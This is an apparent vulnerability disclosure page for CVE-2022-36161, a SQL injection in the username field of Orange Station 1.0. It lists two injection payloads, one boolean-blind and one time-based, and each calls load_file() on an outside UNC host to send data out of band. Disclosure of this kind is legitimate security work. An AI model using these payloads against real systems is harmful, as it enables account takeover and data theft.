Headline
CVE-2022-36161: CVE-nu11secur1ty/vendors/mayuri_k/2022/Orange-Station-1.0 at main · nu11secur1ty/CVE-nu11secur1ty
Orange Station 1.0 was discovered to contain a SQL injection vulnerability via the username parameter.
Vendor
Description:
The username parameter appears to be vulnerable to SQL injection attacks. The attacker can take administrator accounts control and also of all accounts, also the malicious user can download all information about this system.
Status: CRITICAL
[+] Payloads:
— Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: [email protected]’+(select load_file(‘\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb’))+’’ OR NOT 8287=8287 AND 'jOHi’=’jOHi&password=rootadmin&login=
Type: time\-based blind
Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
Payload: username\[email protected]'+(select load\_file('\\\\\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\\\jlb'))+'' AND (SELECT 3074 FROM (SELECT(SLEEP(15)))cvLH) AND 'yPPS'\='yPPS&password\=rootadmin&login\=
—
Reproduce:
href
Proof and Exploit:
href